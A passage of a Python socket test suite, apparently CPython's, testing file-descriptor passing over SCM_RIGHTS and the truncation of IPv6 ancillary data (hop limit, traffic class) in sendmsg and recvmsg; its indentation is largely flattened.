def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
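# Each ancillary data item handled below is a (cmsg_level, cmsg_type,
# cmsg_data) tuple, e.g. (IPPROTO_IPV6, IPV6_HOPLIMIT, <4-byte native int>)
# for the received hop limit.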
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
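    # Rough illustration of the distinction (a sketch, assuming a 4-byte
    # int; exact values are platform-dependent):
    #     socket.CMSG_LEN(4)   -> header size + 4, no trailing padding
    #     socket.CMSG_SPACE(4) -> header size + 4, rounded up for alignment
    # so CMSG_SPACE(n) >= CMSG_LEN(n), and only CMSG_SPACE-sized buffers
    # are guaranteed to hold a complete item portably.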
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
    def testSecondCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
    @testSecondCmsgTruncInData.client_skip
    def _testSecondCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
